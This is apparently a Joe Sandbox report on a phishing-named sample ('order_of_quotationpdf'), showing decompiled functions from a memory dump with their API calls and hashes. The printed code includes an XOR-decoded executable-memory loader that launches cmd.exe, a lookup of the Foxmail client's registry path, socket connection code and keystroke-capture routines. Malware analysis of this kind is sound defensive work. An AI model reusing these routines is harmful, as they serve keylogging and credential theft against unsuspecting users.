Strings

h#B, xrefs: 004224E4

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID: h#B
API String ID: 1083639309-2684228695
Opcode ID: c351597bb179ecb24a4efdcf43c9a286ff6a682ccd0a8afd102ae423cbef802e
Instruction ID: 13e8403fc51368c987e45a9dafb1e0509d713439b1d71d167408327faa29d745
Opcode Fuzzy Hash: c351597bb179ecb24a4efdcf43c9a286ff6a682ccd0a8afd102ae423cbef802e
Instruction Fuzzy Hash: B5315A70E0025DBFDF21CFA4D955BEEFBB4AF14300F8080AAE444A6291D7B89A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00421799 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00421799(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t35;
				intOrPtr _t38;
				signed int _t46;

				_v16 = E00401000(0x800);
				_v8 = _v8 & 0x00000000;
				while(_v8 < 0x601) {
					_t8 = _v8 + 0x42c168; // 0x0
					 *((char*)(_v16 + _v8)) =  *_t8 ^ 0x00000045;
					_v8 = _v8 + 1;
				}
				VirtualProtect(_v16, 0x7d0, 0x40,  &_v28);
				_v20 = _v16 + 0xef;
				_v12 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
				GetWindowsDirectoryW(_v12, 0x104);
				_t35 = lstrlenW(_v12);
				_t46 = 0xa;
				memcpy(_v12 + _t35 * 2, L"\\System32\\cmd.exe", _t46 << 2);
				_v24 = _v20;
				_t38 = _v24(_v12, _a4, 0, 0);
				_v32 = _t38;
				return _t38;
			}

0x004217ac
0x004217af
0x004217bc
0x004217c8
0x004217d8
0x004217b9
0x004217b9
0x004217ea
0x004217f8
0x0042180f
0x0042181a
0x00421823
0x00421831
0x00421837
0x0042183c
0x00421849
0x0042184c
0x00421852

APIs

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

VirtualProtect.KERNEL32(?,000007D0,00000040,?,?,?,?,?,?,?,?,00421973), ref: 004217EA
VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,?,?,?,?,?,?,00421973), ref: 00421809
GetWindowsDirectoryW.KERNEL32(00421973,00000104,?,?,?,?,?,?,?,00421973), ref: 0042181A
lstrlenW.KERNEL32(00421973,?,?,?,?,?,?,?,00421973), ref: 00421823

Strings

\System32\cmd.exe, xrefs: 00421832

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 2244922440-2003734499
Opcode ID: 0e521bad8d2b361d277000ace2352758749c8e3c6e0268d3eca781015fed0025
Instruction ID: 86e05eb07d83ff578ce776a4657210eddb0e3c7bbca977186f5ca7d8f456fd55
Opcode Fuzzy Hash: 0e521bad8d2b361d277000ace2352758749c8e3c6e0268d3eca781015fed0025
Instruction Fuzzy Hash: 6C216770E00208FFEB10DF94DC45BADBBB0EF44305F6040A6E604BA2A1C7B56A52DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A2 Relevance: 8.8, APIs: 7, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A3A2(void* _a4) {
				void* _t27;

				if(_a4 != 0) {
					if( *(_a4 + 0x30) != 0) {
						LocalFree( *(_a4 + 0x30));
					}
					if( *(_a4 + 0x40) != 0) {
						LocalFree( *(_a4 + 0x40));
					}
					if( *(_a4 + 0x48) != 0) {
						LocalFree( *(_a4 + 0x48));
					}
					if( *(_a4 + 0x58) != 0) {
						LocalFree( *(_a4 + 0x58));
					}
					if( *(_a4 + 0x60) != 0) {
						LocalFree( *(_a4 + 0x60));
					}
					if( *(_a4 + 0x68) != 0) {
						LocalFree( *(_a4 + 0x68));
					}
					return LocalFree(_a4);
				}
				return _t27;
			}

0x0041a3a9
0x0041a3b6
0x0041a3be
0x0041a3be
0x0041a3cb
0x0041a3d3
0x0041a3d3
0x0041a3e0
0x0041a3e8
0x0041a3e8
0x0041a3f5
0x0041a3fd
0x0041a3fd
0x0041a40a
0x0041a412
0x0041a412
0x0041a41f
0x0041a427
0x0041a427
0x00000000
0x0041a430
0x0041a437

APIs

LocalFree.KERNEL32(?), ref: 0041A3BE
LocalFree.KERNEL32(?), ref: 0041A3D3
LocalFree.KERNEL32(?), ref: 0041A3E8
LocalFree.KERNEL32(?), ref: 0041A3FD
LocalFree.KERNEL32(?), ref: 0041A412
LocalFree.KERNEL32(?), ref: 0041A427
LocalFree.KERNEL32(00000000), ref: 0041A430

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 7a957edd0fb2a52bbb99a08593a9e5d2c59dcb6cc39f2ff3ede3cc2efd9d0237
Instruction ID: 3df0e54856b6de46ce87d0fb6416794d3aad77774309a64b3e3e787f511c1895
Opcode Fuzzy Hash: 7a957edd0fb2a52bbb99a08593a9e5d2c59dcb6cc39f2ff3ede3cc2efd9d0237
Instruction Fuzzy Hash: 5D114F35201108EFDB65DF48D888BD93BA6BF04345F8280A1F9098B672C775DDE5EB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041475A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041475A() {
				long _v8;
				int _v12;
				void* _v16;
				long _v20;

				_v8 = RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v16);
				if(_v8 != 0) {
					return 0;
				}
				_v12 = 0x104;
				_v20 = RegQueryValueExA(_v16, "Executable", 0, 0, 0x42cdb8,  &_v12);
				if(_v20 != 0) {
					return 0;
				}
				PathRemoveFileSpecA(0x42cdb8);
				return 1;
			}

0x0041477b
0x00414782
0x00000000
0x004147c6
0x00414784
0x004147a6
0x004147ad
0x00000000
0x004147c0
0x004147b4
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00414775
RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,0042CDB8,00000104), ref: 004147A0
PathRemoveFileSpecA.SHLWAPI(0042CDB8), ref: 004147B4

Strings

software\Aerofox\FoxmailPreview, xrefs: 0041476B
Executable, xrefs: 00414798

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FileOpenPathQueryRemoveSpecValue
String ID: Executable$software\Aerofox\FoxmailPreview
API String ID: 3687894118-2371247776
Opcode ID: 0081cdf10826a527b8644bbe608db9c2a89edc982e794d6df87de28fca246bd6
Instruction ID: 359778e6a0c012c6e6d985facfc1d700bc7b05759e07b31ed269976528e93309
Opcode Fuzzy Hash: 0081cdf10826a527b8644bbe608db9c2a89edc982e794d6df87de28fca246bd6
Instruction Fuzzy Hash: C1F09634A80328FFDB109B90EC45BDD77B4AF55B01FB00566E911721C1C3B81685965C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D703 Relevance: 7.6, APIs: 5, Instructions: 61networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0041D712
gethostbyname.WS2_32(?), ref: 0041D71E
htons.WS2_32(0041D6D0), ref: 0041D754
InetNtopW.WS2_32(00000002,?,?,00000802), ref: 0041D786
connect.WS2_32(?,?,00000010), ref: 0041D7A3

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: InetNtopconnectgethostbynamehtonssocket
String ID:
API String ID: 2393792429-0
Opcode ID: aed7d02293cc56e35a855f1455e04f7ddb375ee431f3ef26fbaee2c4ff297e0c
Instruction ID: a2915bc21a066d26722106fa1028bb8c5902f8a79e14c0bac6210bcc11defe98
Opcode Fuzzy Hash: aed7d02293cc56e35a855f1455e04f7ddb375ee431f3ef26fbaee2c4ff297e0c
Instruction Fuzzy Hash: 27218174E00208AFDB10DBA0DC46FADBBB8BF08304F104066F915E62D1E7759A429B95

Uniqueness

Uniqueness Score: -1.00%

Function 00417176 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00417176(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _t41;

				_push(__ecx);
				_v8 = __ecx;
				FreeLibrary( *(_v8 + 0xd0));
				 *(_v8 + 0xd0) =  *(_v8 + 0xd0) & 0x00000000;
				FreeLibrary( *(_v8 + 0xc4));
				 *(_v8 + 0xc4) =  *(_v8 + 0xc4) & 0x00000000;
				FreeLibrary( *(_v8 + 0xc8));
				 *(_v8 + 0xc8) =  *(_v8 + 0xc8) & 0x00000000;
				FreeLibrary( *(_v8 + 0xd4));
				 *(_v8 + 0xd4) =  *(_v8 + 0xd4) & 0x00000000;
				FreeLibrary( *(_v8 + 0xcc));
				_t41 = _v8;
				 *(_t41 + 0xcc) =  *(_t41 + 0xcc) & 0x00000000;
				return _t41;
			}

0x00417179
0x0041717a
0x00417186
0x0041718f
0x0041719f
0x004171a8
0x004171b8
0x004171c1
0x004171d1
0x004171da
0x004171ea
0x004171f0
0x004171f3
0x004171fb

APIs

FreeLibrary.KERNEL32(?,?,?,0041660B,?,00000000,?,?,?,?,?,?,?,?,Profile), ref: 00417186
FreeLibrary.KERNEL32(?,?,0041660B,?,00000000,?,?,?,?,?,?,?,?,Profile), ref: 0041719F
FreeLibrary.KERNEL32(?,?,0041660B,?,00000000,?,?,?,?,?,?,?,?,Profile), ref: 004171B8
FreeLibrary.KERNEL32(?,?,0041660B,?,00000000,?,?,?,?,?,?,?,?,Profile), ref: 004171D1
FreeLibrary.KERNEL32(?,?,0041660B,?,00000000,?,?,?,?,?,?,?,?,Profile), ref: 004171EA

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9a66587fb05b627a55881fbdfa2bcea3468024f24faf8d604c49d87869d4c9f6
Instruction ID: d7bb929667f8cfdd35d27437bf37d9249936a024eb73f63bb91a65f0e3e06421
Opcode Fuzzy Hash: 9a66587fb05b627a55881fbdfa2bcea3468024f24faf8d604c49d87869d4c9f6
Instruction Fuzzy Hash: 72016735611104EFDB41CB94DD49FA8BBF0BB08305F1541F5E508AB262C7716A14AF54

Uniqueness

Uniqueness Score: -1.00%

Function 00416C9C Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00416C9C(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _t41;

				_push(__ecx);
				_v8 = __ecx;
				FreeLibrary( *(_v8 + 0xd0));
				 *(_v8 + 0xd0) =  *(_v8 + 0xd0) & 0x00000000;
				FreeLibrary( *(_v8 + 0xc4));
				 *(_v8 + 0xc4) =  *(_v8 + 0xc4) & 0x00000000;
				FreeLibrary( *(_v8 + 0xc8));
				 *(_v8 + 0xc8) =  *(_v8 + 0xc8) & 0x00000000;
				FreeLibrary( *(_v8 + 0xd4));
				 *(_v8 + 0xd4) =  *(_v8 + 0xd4) & 0x00000000;
				FreeLibrary( *(_v8 + 0xcc));
				_t41 = _v8;
				 *(_t41 + 0xcc) =  *(_t41 + 0xcc) & 0x00000000;
				return _t41;
			}

0x00416c9f
0x00416ca0
0x00416cac
0x00416cb5
0x00416cc5
0x00416cce
0x00416cde
0x00416ce7
0x00416cf7
0x00416d00
0x00416d10
0x00416d16
0x00416d19
0x00416d21

APIs

FreeLibrary.KERNEL32(?,?,?,00415E28,?,?,?,?,?,?,?,?,?,Profile), ref: 00416CAC
FreeLibrary.KERNEL32(?,?,00415E28,?,?,?,?,?,?,?,?,?,Profile), ref: 00416CC5
FreeLibrary.KERNEL32(?,?,00415E28,?,?,?,?,?,?,?,?,?,Profile), ref: 00416CDE
FreeLibrary.KERNEL32(?,?,00415E28,?,?,?,?,?,?,?,?,?,Profile), ref: 00416CF7
FreeLibrary.KERNEL32(?,?,00415E28,?,?,?,?,?,?,?,?,?,Profile), ref: 00416D10

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9a66587fb05b627a55881fbdfa2bcea3468024f24faf8d604c49d87869d4c9f6
Instruction ID: d7bb929667f8cfdd35d27437bf37d9249936a024eb73f63bb91a65f0e3e06421
Opcode Fuzzy Hash: 9a66587fb05b627a55881fbdfa2bcea3468024f24faf8d604c49d87869d4c9f6
Instruction Fuzzy Hash: 72016735611104EFDB41CB94DD49FA8BBF0BB08305F1541F5E508AB262C7716A14AF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041398F Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041398F(void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				int _v12;
				char _v20;
				signed int _v24;
				char _v28;
				char _v284;

				E00403C70( &_v28, __eflags);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = _a8 & 0x000000ff;
				if(_v8 > 0x63) {
					__eflags = _v8 - 0xba;
					if(_v8 > 0xba) {
						__eflags = _v8 - 0xc0;
						if(_v8 > 0xc0) {
							__eflags = _v8 - 0xdb;
							if(_v8 == 0xdb) {
								goto L60;
							} else {
								__eflags = _v8 - 0xdc;
								if(_v8 == 0xdc) {
									goto L60;
								} else {
									__eflags = _v8 - 0xdd;
									if(_v8 == 0xdd) {
										goto L60;
									} else {
										__eflags = _v8 - 0xde;
										if(_v8 == 0xde) {
											goto L60;
										} else {
											goto L61;
										}
									}
								}
							}
						} else {
							__eflags = _v8 - 0xc0;
							if(_v8 == 0xc0) {
								goto L60;
							} else {
								__eflags = _v8 - 0xbb;
								if(_v8 == 0xbb) {
									goto L60;
								} else {
									__eflags = _v8 - 0xbc;
									if(_v8 == 0xbc) {
										goto L60;
									} else {
										__eflags = _v8 - 0xbd;
										if(_v8 == 0xbd) {
											goto L60;
										} else {
											__eflags = _v8 - 0xbe;
											if(_v8 == 0xbe) {
												goto L60;
											} else {
												__eflags = _v8 - 0xbf;
												if(_v8 == 0xbf) {
													goto L60;
												} else {
													goto L61;
												}
											}
										}
									}
								}
							}
						}
					} else {
						__eflags = _v8 - 0xba;
						if(_v8 == 0xba) {
							goto L60;
						} else {
							__eflags = _v8 - 0x69;
							if(_v8 > 0x69) {
								__eflags = _v8 - 0xad;
								if(_v8 == 0xad) {
									goto L60;
								} else {
									__eflags = _v8 - 0xae;
									if(_v8 == 0xae) {
										goto L60;
									} else {
										__eflags = _v8 - 0xaf;
										if(_v8 == 0xaf) {
											goto L60;
										} else {
											__eflags = _v8 - 0xb2;
											if(_v8 == 0xb2) {
												goto L60;
											} else {
												__eflags = _v8 - 0xb3;
												if(_v8 == 0xb3) {
													goto L60;
												} else {
													goto L61;
												}
											}
										}
									}
								}
							} else {
								__eflags = _v8 - 0x69;
								if(_v8 == 0x69) {
									goto L60;
								} else {
									__eflags = _v8 - 0x64;
									if(_v8 == 0x64) {
										goto L60;
									} else {
										__eflags = _v8 - 0x65;
										if(_v8 == 0x65) {
											goto L60;
										} else {
											__eflags = _v8 - 0x66;
											if(_v8 == 0x66) {
												goto L60;
											} else {
												__eflags = _v8 - 0x67;
												if(_v8 == 0x67) {
													goto L60;
												} else {
													__eflags = _v8 - 0x68;
													if(_v8 == 0x68) {
														goto L60;
													} else {
														goto L61;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					if(_v8 == 0x63) {
						L60:
						_v24 = _a8 & 0x000000ff;
					} else {
						if(_v8 > 0x24) {
							__eflags = _v8 - 0x5b;
							if(_v8 > 0x5b) {
								__eflags = _v8 - 0x5c;
								if(_v8 == 0x5c) {
									goto L60;
								} else {
									__eflags = _v8 - 0x60;
									if(_v8 == 0x60) {
										goto L60;
									} else {
										__eflags = _v8 - 0x61;
										if(_v8 == 0x61) {
											goto L60;
										} else {
											__eflags = _v8 - 0x62;
											if(_v8 == 0x62) {
												goto L60;
											} else {
												goto L61;
											}
										}
									}
								}
							} else {
								__eflags = _v8 - 0x5b;
								if(_v8 == 0x5b) {
									goto L60;
								} else {
									__eflags = _v8 - 0x25;
									if(_v8 == 0x25) {
										goto L60;
									} else {
										__eflags = _v8 - 0x26;
										if(_v8 == 0x26) {
											goto L60;
										} else {
											__eflags = _v8 - 0x27;
											if(_v8 == 0x27) {
												goto L60;
											} else {
												__eflags = _v8 - 0x28;
												if(_v8 == 0x28) {
													goto L60;
												} else {
													__eflags = _v8 - 0x2e;
													if(_v8 == 0x2e) {
														goto L60;
													} else {
														goto L61;
													}
												}
											}
										}
									}
								}
							}
						} else {
							if(_v8 == 0x24) {
								goto L60;
							} else {
								if(_v8 > 0x12) {
									__eflags = _v8 - 0x14;
									if(_v8 == 0x14) {
										goto L60;
									} else {
										__eflags = _v8 - 0x20;
										if(_v8 == 0x20) {
											goto L60;
										} else {
											__eflags = _v8 - 0x21;
											if(_v8 == 0x21) {
												goto L60;
											} else {
												__eflags = _v8 - 0x22;
												if(_v8 == 0x22) {
													goto L60;
												} else {
													__eflags = _v8 - 0x23;
													if(_v8 == 0x23) {
														goto L60;
													} else {
														goto L61;
													}
												}
											}
										}
									}
								} else {
									if(_v8 == 0x12 || _v8 == 8 || _v8 == 9 || _v8 == 0xd || _v8 == 0x10 || _v8 == 0x11) {
										goto L60;
									} else {
										L61:
										E0040132F( &_v284, 0, 0x100);
										_v12 = MapVirtualKeyA(_a8 & 0x000000ff, 0);
										_t62 =  &_v20; // 0x413320
										ToUnicode(_a8 & 0x000000ff, _v12,  &_v284, _t62, 1, 0);
									}
								}
							}
						}
					}
				}
				E00402EF8(_a4,  &_v28);
				E00402EB2( &_v28);
				return _a4;
			}

0x0041399c
0x004139a6
0x004139a7
0x004139a8
0x004139a9
0x004139ae
0x004139b5
0x00413acb
0x00413ad2
0x00413b63
0x00413b6a
0x00413ba4
0x00413bab
0x00000000
0x00413bad
0x00413bad
0x00413bb4
0x00000000
0x00413bb6
0x00413bb6
0x00413bbd
0x00000000
0x00413bbf
0x00413bbf
0x00413bc6
0x00000000
0x00413bc8
0x00000000
0x00413bc8
0x00413bc6
0x00413bbd
0x00413bb4
0x00413b6c
0x00413b6c
0x00413b73
0x00000000
0x00413b75
0x00413b75
0x00413b7c
0x00000000
0x00413b7e
0x00413b7e
0x00413b85
0x00000000
0x00413b87
0x00413b87
0x00413b8e
0x00000000
0x00413b90
0x00413b90
0x00413b97
0x00000000
0x00413b99
0x00413b99
0x00413ba0
0x00000000
0x00413ba2
0x00000000
0x00413ba2
0x00413ba0
0x00413b97
0x00413b8e
0x00413b85
0x00413b7c
0x00413b73
0x00413ad8
0x00413ad8
0x00413adf
0x00000000
0x00413ae5
0x00413ae5
0x00413ae9
0x00413b2c
0x00413b33
0x00000000
0x00413b39
0x00413b39
0x00413b40
0x00000000
0x00413b46
0x00413b46
0x00413b4d
0x00000000
0x00413b4f
0x00413b4f
0x00413b56
0x00000000
0x00413b58
0x00413b58
0x00413b5f
0x00000000
0x00413b61
0x00000000
0x00413b61
0x00413b5f
0x00413b56
0x00413b4d
0x00413b40
0x00413aeb
0x00413aeb
0x00413aef
0x00000000
0x00413af5
0x00413af5
0x00413af9
0x00000000
0x00413aff
0x00413aff
0x00413b03
0x00000000
0x00413b09
0x00413b09
0x00413b0d
0x00000000
0x00413b13
0x00413b13
0x00413b17
0x00000000
0x00413b1d
0x00413b1d
0x00413b21
0x00000000
0x00413b27
0x00000000
0x00413b27
0x00413b21
0x00413b17
0x00413b0d
0x00413b03
0x00413af9
0x00413aef
0x00413ae9
0x00413adf
0x004139bb
0x004139bf
0x00413bca
0x00413bce
0x004139c5
0x004139c9
0x00413a57
0x00413a5b
0x00413a9e
0x00413aa2
0x00000000
0x00413aa8
0x00413aa8
0x00413aac
0x00000000
0x00413ab2
0x00413ab2
0x00413ab6
0x00000000
0x00413abc
0x00413abc
0x00413ac0
0x00000000
0x00413ac6
0x00000000
0x00413ac6
0x00413ac0
0x00413ab6
0x00413aac
0x00413a5d
0x00413a5d
0x00413a61
0x00000000
0x00413a67
0x00413a67
0x00413a6b
0x00000000
0x00413a71
0x00413a71
0x00413a75
0x00000000
0x00413a7b
0x00413a7b
0x00413a7f
0x00000000
0x00413a85
0x00413a85
0x00413a89
0x00000000
0x00413a8f
0x00413a8f
0x00413a93
0x00000000
0x00413a99
0x00000000
0x00413a99
0x00413a93
0x00413a89
0x00413a7f
0x00413a75
0x00413a6b
0x00413a61
0x004139cf
0x004139d3
0x00000000
0x004139d9
0x004139dd
0x00413a20
0x00413a24
0x00000000
0x00413a2a
0x00413a2a
0x00413a2e
0x00000000
0x00413a34
0x00413a34
0x00413a38
0x00000000
0x00413a3e
0x00413a3e
0x00413a42
0x00000000
0x00413a48
0x00413a48
0x00413a4c
0x00000000
0x00413a52
0x00000000
0x00413a52
0x00413a4c
0x00413a42
0x00413a38
0x00413a2e
0x004139df
0x004139e3
0x00000000
0x00413a1b
0x00413bd3
0x00413be1
0x00413bf6
0x00413bfd
0x00413c10
0x00413c10
0x004139e3
0x004139dd
0x004139d3
0x004139c9
0x004139bf
0x00413c1d
0x00413c25
0x00413c2f

APIs

MapVirtualKeyA.USER32 ref: 00413BF0
ToUnicode.USER32 ref: 00413C10

Strings

3A, xrefs: 00413BFD, 00413C00
h, xrefs: 00413B1D

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: UnicodeVirtual
String ID: 3A$h
API String ID: 566908582-648306797
Opcode ID: ec27f4539e648df3adc56c8ef807bfc74d184b53605b45d36fc792d6c4d87369
Instruction ID: b6862f86f85a7131b055da79b0cc95d3716f23a252d20a8c5fe0cdc53a1a2c71
Opcode Fuzzy Hash: ec27f4539e648df3adc56c8ef807bfc74d184b53605b45d36fc792d6c4d87369
Instruction Fuzzy Hash: 7A51B830909609EAEF34CF98C6497EEB770AB05707F1480A7D511621D2E3B86FC5EA5B

Uniqueness

Uniqueness Score: -1.00%

Function 004136E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004136E8(void* __eflags, signed int _a4) {
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				short _v276;
				char _v532;

				E0040132F( &_v276, 0, 0x100);
				_v20 = _v20 & 0x00000000;
				_v16 = MapVirtualKeyA(_a4 & 0x000000ff, 0);
				_v8 = _a4 & 0x000000ff;
				if(_v8 > 0x63) {
					if(_v8 > 0xba) {
						if(_v8 > 0xc0) {
							if(_v8 == 0xdb || _v8 == 0xdc || _v8 == 0xdd || _v8 == 0xde) {
								goto L60;
							} else {
							}
						} else {
							if(_v8 == 0xc0 || _v8 == 0xbb || _v8 == 0xbc || _v8 == 0xbd || _v8 == 0xbe || _v8 == 0xbf) {
								goto L60;
							} else {
							}
						}
					} else {
						if(_v8 == 0xba) {
							goto L60;
						} else {
							if(_v8 > 0x69) {
								if(_v8 == 0xad || _v8 == 0xae || _v8 == 0xaf || _v8 == 0xb2 || _v8 == 0xb3) {
									goto L60;
								} else {
								}
							} else {
								if(_v8 == 0x69 || _v8 == 0x64 || _v8 == 0x65 || _v8 == 0x66 || _v8 == 0x67 || _v8 == 0x68) {
									goto L60;
								} else {
								}
							}
						}
					}
				} else {
					if(_v8 == 0x63) {
						L60:
						_v16 = _v16 | 0x00000100;
					} else {
						if(_v8 > 0x24) {
							if(_v8 > 0x5b) {
								if(_v8 == 0x5c || _v8 == 0x60 || _v8 == 0x61 || _v8 == 0x62) {
									goto L60;
								} else {
								}
							} else {
								if(_v8 == 0x5b || _v8 == 0x25 || _v8 == 0x26 || _v8 == 0x27 || _v8 == 0x28 || _v8 == 0x2e) {
									goto L60;
								} else {
								}
							}
						} else {
							if(_v8 == 0x24) {
								goto L60;
							} else {
								if(_v8 > 0x12) {
									if(_v8 == 0x14 || _v8 == 0x20 || _v8 == 0x21 || _v8 == 0x22 || _v8 == 0x23) {
										goto L60;
									} else {
									}
								} else {
									if(_v8 == 0x12 || _v8 == 8 || _v8 == 9 || _v8 == 0xd || _v8 == 0x10 || _v8 == 0x11) {
										goto L60;
									} else {
									}
								}
							}
						}
					}
				}
				E0040132F( &_v532, 0, 0x100);
				_v9 = GetKeyState(_a4 & 0x000000ff);
				ToUnicode(_a4 & 0x000000ff, _v16,  &_v9,  &_v276, 1, 0);
				return  &_v276;
			}

0x004136ff
0x00413707
0x00413718
0x0041371f
0x00413726
0x00413843
0x004138db
0x0041391c
0x00000000
0x00000000
0x00413939
0x004138dd
0x004138e4
0x00000000
0x00000000
0x00413913
0x004138e4
0x00413849
0x00413850
0x00000000
0x00413856
0x0041385a
0x004138a4
0x00000000
0x00000000
0x004138d2
0x0041385c
0x00413860
0x00000000
0x00000000
0x00413898
0x00413860
0x0041385a
0x00413850
0x0041372c
0x00413730
0x0041393b
0x00413943
0x00413736
0x0041373a
0x004137cc
0x00413813
0x00000000
0x00000000
0x00413837
0x004137ce
0x004137d2
0x00000000
0x00000000
0x0041380a
0x004137d2
0x00413740
0x00413744
0x00000000
0x0041374a
0x0041374e
0x00413795
0x00000000
0x00000000
0x004137c3
0x00413750
0x00413754
0x00000000
0x00000000
0x0041378c
0x00413754
0x0041374e
0x00413744
0x0041373a
0x00413730
0x00413954
0x00413967
0x00413981
0x0041398e

APIs

MapVirtualKeyA.USER32 ref: 00413712
GetKeyState.USER32(?), ref: 00413961
ToUnicode.USER32 ref: 00413981

Strings

h, xrefs: 0041388E

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: StateUnicodeVirtual
String ID: h
API String ID: 2601020528-2439710439
Opcode ID: 5d52215211861a258220160f3743dc03de4f941d84b412d83829e4116ca19f2f
Instruction ID: 0fb4c7d91841f824d315da1567429d0241dd059938bd7a9a6f6fa51d9b804d4a
Opcode Fuzzy Hash: 5d52215211861a258220160f3743dc03de4f941d84b412d83829e4116ca19f2f
Instruction Fuzzy Hash: 18516FF0817248EADF34CE95C7597EDB674AB05717F2880ABD84262160C3F84FC4EA5A

Uniqueness

Uniqueness Score: -1.00%

Function 00405B75 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405B75(void* __eflags, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v13;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				void* _v44;
				char _v52;
				char _v76;
				short _v596;
				signed int _t64;
				void* _t75;
				void* _t76;
				void* _t97;
				void* _t133;

				_v8 = _a8;
				_v20 = _v20 & 0x00000000;
				E00406F52( &_v12);
